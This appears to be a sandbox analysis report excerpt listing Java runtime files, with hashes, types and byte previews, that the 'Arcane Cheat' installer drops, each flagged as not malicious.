                                SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                MD5:A387B65159C9887265BABDEF9CA8DAE5
                                SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                Malicious:false
                                Preview:....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..........................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\cmm\sRGB.pf (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):7.026867070945169
                                Encrypted:false
                                SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                Malicious:false
                                Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\content-types.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):5.074440246603207
                                Encrypted:false
                                SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                MD5:95AE170D90764B3F5E68C72E8C518DDC
                                SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                Malicious:false
                                Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\currency.data (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):4122
                                Entropy (8bit):3.2585384283455134
                                Encrypted:false
                                SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                MD5:F6258230B51220609A60AA6BA70D68F3
                                SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                Malicious:false
                                Preview:CurD..........................@C..,M...................... K...C..PF..4@...........R...........C......TF...........M..DL...C.......S..........<M...c...................C...C...A..........hK...C...M.......... O......8...PC...C..........@E...............E..............`.......pX...O...........B...C.......O...D..............,J..........................................@J..............XO..........................................0C...........................O...........................................M.......A...............................................................C...O...................................................................O..........TK...........R...O..............8C...........................P.................. C..............................................`C..........PK...............J......0F..pE...................................Q...............................R.......Q...........c...Q...................................................................................C

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2282861
                                Entropy (8bit):7.951223313727943
                                Encrypted:false
                                SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/oracle/PK...........H................com/oracle/deploy/PK...........H................com/oracle/deploy/update/PK...........H................com/sun/PK...........H................com/sun/applet2/PK...........H................com/sun/applet2/preloader/PK...........H............ ...com/sun/applet2/preloader/event/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/appcontext/PK...........H................com/sun/deploy/association/PK...........H............#...com/sun/deploy/association/utility/PK...........H................com/sun/deploy/cache/PK...........H................com/sun/deploy/config/PK...........H................com/sun/deploy/jardiff/PK...........H................com/sun/deploy/model/PK.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\ffjcext.zip (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):14156
                                Entropy (8bit):5.649187440261259
                                Encrypted:false
                                SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                MD5:91052ADB799AEF68EA76931997C40CE4
                                SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                Malicious:false
                                Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-02PG7.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1575), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.832330268062187
                                Encrypted:false
                                SSDEEP:48:KE2CXpRLJDNXQC6tNaEGBlu9hUv5//zEvDiwkISAyHgKe1p6KF/uoYuh1LNRtS0f:KERXlp6tN1VHq1Kt1S4x8Xi
                                MD5:FFE3CC16616314296C3262B0A0E093CD
                                SHA1:198DD1C6E6707C10AE74A1C42E8A91C429598F3B
                                SHA-256:3941736BEF6A8E53D002B6B67ECE4793C2F3F34BCC1ECB271684EB3F73FC4103
                                SHA-512:CD3A9329F405CA14E11CDBB74D467B31A31530CBF00537B16FB23AEBC6C07EB268E9624FDBC997AA0CF4852DAC288E1D011E2FC392D71E25DBDF52E359BA9D4E
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erreur interne, message inconnu..error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration..error.launch.execv=Erreur lors de l'appel de Java Web Start (execv)..error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) ..error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket..error.accept.failed=Accueil : \u00E9chec d'accept..error.recv.failed=Accueil : \u00E9chec de recv..error.invalid.port=Accueil : impossible de r\u00E9activer un port valide..error.read=Lecture apr\u00E8s la fin de tampon..error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton..error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n..# "Last WinSock Error" means the error message for the last operation that

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-0FC44.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):8590
                                Entropy (8bit):7.910688771816331
                                Encrypted:false
                                SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                MD5:249053609EAF5B17DDD42149FC24C469
                                SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                Malicious:false
                                Preview:GIF89a@................................................FFF...T..W..V..Is.Kv.W..W..U..Hr.P|.O{.Mx.Gq.Jt.Fo.Fp.V..U..Gp.T..Lw.P|.R..Q~.S..S..Nz.Lw.Hq.Ju.X..V..Lx.It.U..Hs.Ny.Nz.P}.R~.S..R~.R..Q}.Q}.My.Lv.It.O{.Ku.My.Oz.Gp.Gq.Hr.....................WWW.........Ry.uuu............i......ggg...]..................{..y..d..........Sz................s............i...............c............v.....X........r...........]........^........p.....z.........r..Y..l..m...............]................Mu........Qw.Nw.........v.....b..j.......V}.]........d.....k........v........Lu....S|.U{.Oy................W........Lv.U..R}.....Nv.Gp.Nx.Ks....Jr....Hq......V~.T..S~.Z.....Gq.O{.......W..Qz.......Lw.Z.....T...........S~....Lt.Kv....V.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-0KRQK.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                Category:dropped
                                Size (bytes):14156
                                Entropy (8bit):5.649187440261259
                                Encrypted:false
                                SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                MD5:91052ADB799AEF68EA76931997C40CE4
                                SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                Malicious:false
                                Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-9JGEJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2917
                                Entropy (8bit):4.838706790124659
                                Encrypted:false
                                SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                MD5:2EB9117D147BAA0578E4000DA9B29E12
                                SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-AEG93.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1386), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.927824210480987
                                Encrypted:false
                                SSDEEP:96:KYD1QNsQZ/lmo8ZuLgdBGpv3JRJ/7coh91XlK7Q/vm2QAfO:9D1+sCmapce1KGm2QIO
                                MD5:81BBDEA4DC9803A6EB78CE7D5CA018ED
                                SHA1:9AAF012276AD89CE7273CF5F0BE4C95B72D906AB
                                SHA-256:565B8FF1F31784378884D9D7468FFDFDDA5B001ACB5BB393A5006AC19BE4E67A
                                SHA-512:310017DD27C91C492188737494DA04CAB241D0BF4E91326AFB4A3F98CBFF78A6C0BBC14EC7E883597E9D506FAA80BA4E9A25B5F46BFD2543850323061E829A84
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internt fel, ok\u00E4nt meddelande..error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen..error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv)..error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) ..error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte..error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras..error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga..error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port..error.read=L\u00E4ste f\u00F6rbi slutet av bufferten..error.xmlparsing=XML-tolkningsfel: fel typ av igenk\u00E4nningstecken hittades..error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n..# "Last

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-C26GO.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2601), with CRLF line terminators
                                Category:dropped
                                Size (bytes):5744
                                Entropy (8bit):4.781504394194986
                                Encrypted:false
                                SSDEEP:96:GhymCk3kjLqgz9RkfrsEW/p9M32i0HkZr+ywc8b8+/moD7yct070DL70Dm:Dm5kLfIErMbT/44in
                                MD5:64DE22212EE92F29BCA3ACED72737254
                                SHA1:C4DBC247043578CCF9CD8DAB652D096703D5B26E
                                SHA-256:292696C94D5FD0BF2FF4AF9E4D363BFCBE888D2E65BD18A20CF71081FB1C9B0D
                                SHA-512:CA33C75B66D8B5316B1C3ED41A9A14DD8611A3BB9B26EFDC7F468250696D515CF1E966831975C9ABDC33E9A1C59167FE79BA547592D2A04997E1342433E7B628
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4...error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4...error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4...error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. ..error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.r

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-EPLI5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2924), with CRLF line terminators
                                Category:dropped
                                Size (bytes):6381
                                Entropy (8bit):4.5983590678211135
                                Encrypted:false
                                SSDEEP:96:Mu7cepcgD8do+O2D+k8/RJFGQcHGqo72hzEflA44CAmIbIC3j5pN/o8woJe:PctgYqhTYzG2O
                                MD5:D830FC76BDD1975010ECE4C5369DADF8
                                SHA1:D8CC3F54325142EFA740026E2BC623AFE6F3ACB5
                                SHA-256:11E886336BA51A9044AB1A87C60CEEE34C29BB724E06A16968D31531A7001064
                                SHA-512:7B867A50A811FBD7FFDAD0B729CA4501E16386EE5C4940A4CF9A805767CC0D10F7E3BDFD6A60204D79292D778D93E3BD915368AC0E9453BBB1010ADFD9655F0F
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8..error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093..error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv)..error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) ..error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.recv.fai

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-F8M9G.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1392), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3255
                                Entropy (8bit):4.7050139579578145
                                Encrypted:false
                                SSDEEP:48:KTi+qOaVUVVMsD/B0FN5+eADELDHxhdpHgKe1uo265eLaqMQ6URhmwgFs+ur60:KJBa2VtzeDLDRhd5A26+7RhZgR0
                                MD5:BF5E5310B2DCF8E8B3697B358AD4446D
                                SHA1:C746AC1F46F607FA8F971BEA2B6853746A4FB28D
                                SHA-256:CC9AD73957535011EE2376C23DE2C2597F877ACEBA9173E822EE79AAD3C4E9E6
                                SHA-512:B6C61D38B0ACC427B9B2F4C19DABD7EACBE8EEA6B973FD31B3555C4C5B3FFAF1CA036B730359346F57223B44CCE79E04A6D06BBC13C6F7DD26ED463776BB6DCC
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=errore interno, messaggio sconosciuto..error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione..error.launch.execv=Errore durante la chiamata di Java Web Start (execv)..error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) ..error.listener.failed=Apertura: sysCreateListenerSocket non riuscito..error.accept.failed=Apertura: accept non riuscito..error.recv.failed=Apertura: recv non riuscito..error.invalid.port=Apertura: impossibile identificare una porta valida..error.read=Tentativo di lettura dopo la fine del buffer..error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato..error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n..# "Last WinSock Error" means the error message for the last oper

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-HVVCP.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):12250
                                Entropy (8bit):7.901446927123525
                                Encrypted:false
                                SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                Malicious:false
                                Preview:GIF89a.......{.....k......{...........P|.b..V......................Hr.Hq.......................]...........X...........f.............i............R~....u..It.u.....l..T~.......Qz.......^..Q~....i.......b.............Qx.Y..Y.....q..p.....v..............a..U|......T..Y........................^..n........f.....Tz.e..j..f..Ox.p..Y~.Ov.......y..Z..h.....l.....W.....w.....R|.p.....X~.a........Pw.Ks.Ir.......^.....Kt.FFF\........Ox...........W..U..Nw.Mu.W..V..Is.V..Hr.R~.W..W..U..T..O{.Kv.Gp.S..Mx.Lw.Fp.Lw.U..T..Jt.R..Gq.Fo.Ju.My.R..Q}.R~.Nz.Oz.It.Nz.V..V..Gp.Ny.Ku.P|.Ku.Gq.P}.S..Q}.S..S..Is.Lx.U..O{.Hs.T..O{.My.Mx.Kv.Lv............iii...YYY.............xxx........._.....U..Gp.U..Lv.Mw....Oz......S|.S}.Hq.\..Kv....Mv.P{.W..T........Mw.T.....Nz.q..Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-IDQKF.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
